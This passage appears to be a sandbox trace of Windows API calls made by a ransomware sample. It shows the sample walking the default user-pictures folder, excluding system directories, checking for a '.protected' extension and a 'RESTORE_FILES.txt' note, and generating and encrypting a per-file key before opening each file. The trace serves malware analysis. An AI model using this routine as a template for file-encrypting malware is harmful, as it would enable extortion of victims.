cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\.") returned 69 [0071.480] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.480] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.480] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.480] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.480] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.480] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.480] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.480] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\..") returned 70 [0071.480] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.480] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.480] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Windows") returned -1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Program Files") returned 1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Program Files (x86)") returned 1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="$Recycle.bin") returned 1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="System Volume Information") returned 1 [0071.480] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned 82 [0071.481] StrStrIW (lpFirst="usertile10.bmp", lpSrch=".protected") returned 0x0 [0071.481] lstrcmpW (lpString1="usertile10.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.481] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.481] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.483] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.483] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Windows") returned -1 [0071.483] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Program Files") returned 1 [0071.484] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Program Files (x86)") returned 1 [0071.484] lstrcmpiW (lpString1="usertile11.bmp", lpString2="$Recycle.bin") returned 1 [0071.484] lstrcmpiW (lpString1="usertile11.bmp", lpString2="System Volume Information") returned 1 [0071.484] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned 82 [0071.484] StrStrIW (lpFirst="usertile11.bmp", lpSrch=".protected") returned 0x0 [0071.484] lstrcmpW (lpString1="usertile11.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.484] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Windows") returned -1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Program Files") returned 1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Program Files (x86)") returned 1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="$Recycle.bin") returned 1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="System Volume Information") returned 1 [0071.484] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned 82 [0071.484] StrStrIW (lpFirst="usertile12.bmp", lpSrch=".protected") returned 0x0 [0071.484] lstrcmpW (lpString1="usertile12.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.484] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Windows") returned -1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Program Files") returned 1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Program Files (x86)") returned 1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="$Recycle.bin") returned 1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="System Volume Information") returned 1 [0071.485] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned 82 [0071.485] StrStrIW (lpFirst="usertile13.bmp", lpSrch=".protected") returned 0x0 [0071.485] lstrcmpW (lpString1="usertile13.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.485] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.485] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.485] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.485] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Windows") returned -1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Program Files") returned 1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Program Files (x86)") returned 1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="$Recycle.bin") returned 1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="System Volume Information") returned 1 [0071.485] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned 82 [0071.485] StrStrIW (lpFirst="usertile14.bmp", lpSrch=".protected") returned 0x0 [0071.485] lstrcmpW (lpString1="usertile14.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.485] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.485] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.485] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.495] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Windows") returned -1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Program Files") returned 1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Program Files (x86)") returned 1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="$Recycle.bin") returned 1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="System Volume Information") returned 1 [0071.495] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned 82 [0071.495] StrStrIW (lpFirst="usertile15.bmp", lpSrch=".protected") returned 0x0 [0071.495] lstrcmpW (lpString1="usertile15.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.495] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.496] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.497] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Windows") returned -1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Program Files") returned 1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Program Files (x86)") returned 1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", lpString2="$Recycle.bin") returned 1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", lpString2="System Volume Information") returned 1 [0071.497] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned 82 [0071.497] StrStrIW (lpFirst="usertile16.bmp", lpSrch=".protected") returned 0x0 [0071.497] lstrcmpW (lpString1="usertile16.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.497] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.497] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.497] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.497] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Windows") returned -1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Program Files") returned 1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Program Files (x86)") returned 1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="$Recycle.bin") returned 1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="System Volume Information") returned 1 [0071.497] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned 82 [0071.497] StrStrIW (lpFirst="usertile17.bmp", lpSrch=".protected") returned 0x0 [0071.497] lstrcmpW (lpString1="usertile17.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.498] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.498] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Windows") returned -1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Program Files") returned 1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Program Files (x86)") returned 1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="$Recycle.bin") returned 1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="System Volume Information") returned 1 [0071.498] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned 82 [0071.498] StrStrIW (lpFirst="usertile18.bmp", lpSrch=".protected") returned 0x0 [0071.498] lstrcmpW (lpString1="usertile18.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.498] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.505] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Windows") returned -1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Program Files") returned 1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Program Files (x86)") returned 1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="$Recycle.bin") returned 1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="System Volume Information") returned 1 [0071.505] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned 82 [0071.505] StrStrIW (lpFirst="usertile19.bmp", lpSrch=".protected") returned 0x0 [0071.505] lstrcmpW (lpString1="usertile19.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.505] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.505] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.505] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.505] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Windows") returned -1 [0071.505] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Program Files") returned 1 [0071.506] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Program Files (x86)") returned 1 [0071.506] lstrcmpiW (lpString1="usertile20.bmp", lpString2="$Recycle.bin") returned 1 [0071.506] lstrcmpiW (lpString1="usertile20.bmp", lpString2="System Volume Information") returned 1 [0071.506] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned 82 [0071.506] StrStrIW (lpFirst="usertile20.bmp", lpSrch=".protected") returned 0x0 [0071.506] lstrcmpW (lpString1="usertile20.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.506] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.506] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.507] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.507] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Windows") returned -1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Program Files") returned 1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Program Files (x86)") returned 1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="$Recycle.bin") returned 1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="System Volume Information") returned 1 [0071.507] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned 82 [0071.507] StrStrIW (lpFirst="usertile21.bmp", lpSrch=".protected") returned 0x0 [0071.507] lstrcmpW (lpString1="usertile21.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.507] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.507] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.507] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.507] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.507] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Windows") returned -1 [0071.507] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Program Files") returned 1 [0071.507] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Program Files (x86)") returned 1 [0071.507] lstrcmpiW (lpString1="usertile22.bmp", lpString2="$Recycle.bin") returned 1 [0071.507] lstrcmpiW (lpString1="usertile22.bmp", lpString2="System Volume Information") returned 1 [0071.507] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned 82 [0071.507] StrStrIW (lpFirst="usertile22.bmp", lpSrch=".protected") returned 0x0 [0071.507] lstrcmpW (lpString1="usertile22.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.507] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.507] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.513] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Windows") returned -1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Program Files") returned 1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Program Files (x86)") returned 1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="$Recycle.bin") returned 1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="System Volume Information") returned 1 [0071.513] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned 82 [0071.513] StrStrIW (lpFirst="usertile23.bmp", lpSrch=".protected") returned 0x0 [0071.513] lstrcmpW (lpString1="usertile23.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.513] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.514] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.514] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Windows") returned -1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Program Files") returned 1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Program Files (x86)") returned 1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="$Recycle.bin") returned 1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="System Volume Information") returned 1 [0071.514] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned 82 [0071.514] StrStrIW (lpFirst="usertile24.bmp", lpSrch=".protected") returned 0x0 [0071.514] lstrcmpW (lpString1="usertile24.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.514] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.514] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.514] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Windows") returned -1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Program Files") returned 1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Program Files (x86)") returned 1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="$Recycle.bin") returned 1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="System Volume Information") returned 1 [0071.514] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned 82 [0071.514] StrStrIW (lpFirst="usertile25.bmp", lpSrch=".protected") returned 0x0 [0071.514] lstrcmpW (lpString1="usertile25.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.514] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.514] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, 